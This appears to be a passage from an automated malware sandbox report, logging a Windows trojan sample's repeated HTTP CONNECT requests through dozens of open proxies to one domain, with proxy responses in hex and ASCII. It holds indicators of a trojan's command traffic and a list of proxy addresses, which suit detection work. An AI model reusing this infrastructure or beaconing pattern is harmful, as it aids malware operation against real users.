                                                                                1650192.168.2.85366651.75.126.150229355828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.391952991 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.382515907 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.492093086 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1651192.168.2.854654142.54.236.9741455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.392113924 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1652192.168.2.854870175.183.82.22181935828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.392570019 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1653192.168.2.85369791.214.31.23480805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.422431946 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.491950035 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:45.494323969 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:51.507363081 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:54.300663948 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1654192.168.2.85450645.179.231.21056785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.425472975 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1655192.168.2.851239150.220.8.228643125828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.425473928 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1656192.168.2.85491143.153.11.1024435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.426299095 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1657192.168.2.85491843.153.11.1024435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.430088043 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1658192.168.2.85492143.153.11.1024435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.432535887 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1659192.168.2.85492243.153.11.1024435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.436427116 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1660192.168.2.854885192.169.226.96433285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.441622019 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.991822004 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.491934061 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.382936954 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1661192.168.2.85450039.109.113.9731285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.444267988 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.585452080 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.345222950 CET309INHTTP/1.1 400 Bad Request
                                                                                Server: nginx/1.16.1
                                                                                Date: Fri, 23 Feb 2024 13:08:19 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 157
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1662192.168.2.854898184.170.245.14841455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.455948114 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1663192.168.2.854871188.166.197.12931285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.464778900 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1664192.168.2.85490451.83.135.3528465828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.528464079 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1665192.168.2.854909104.16.81.76805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.528470039 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.616492987 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:39 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1666192.168.2.85489685.14.8.22680805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.528564930 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1667192.168.2.85487236.64.238.8210805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.528868914 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1668192.168.2.85490379.110.197.14480815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.529050112 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1669192.168.2.854905185.54.0.1841535828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.529261112 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1670192.168.2.851291107.180.90.88640815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.534622908 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.679279089 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:45.695064068 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1671192.168.2.85490631.43.33.5541535828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.535619974 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1672192.168.2.85374251.158.111.76163795828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.544348955 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.679404020 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.891984940 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1673192.168.2.85452145.67.210.4733895828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.560756922 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:45.174314976 CET131INHTTP/1.1 503 Too many open connections
                                                                                Content-Type: text/plain
                                                                                Connection: close
                                                                                Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0a
                                                                                Data Ascii: Maximum number of open connections reached.


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1674192.168.2.851244185.23.118.103542445828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.560817957 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.679372072 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:45.695077896 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:51.710398912 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1675192.168.2.854507115.244.127.164805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.564207077 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1676192.168.2.85455382.210.56.251805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.566128969 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.585680962 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1677192.168.2.854549185.49.30.580815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.581912994 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1678192.168.2.851315173.249.33.122452415828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.622646093 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1679192.168.2.854919178.249.218.3456785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.634681940 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1680192.168.2.851255170.80.33.10356785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.663026094 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.679450035 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1681192.168.2.854680189.240.60.16890905828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.665878057 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.855542898 CET72INHTTP/1.1 200 Connection established
                                                                                Proxy-Agent: Fortinet-Proxy/1.0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1682192.168.2.854940104.16.72.45805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.666174889 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.753880978 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:39 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1683192.168.2.8537865.2.76.163170005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.666229010 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.679519892 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:45.695067883 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:46.475708961 CET68INHTTP/1.1 200 Connection established
                                                                                Proxy-Agent: Privoxy/3.0.21


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1684192.168.2.851384141.94.174.6595835828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:39.667104006 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1685192.168.2.853875185.129.250.183144625828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
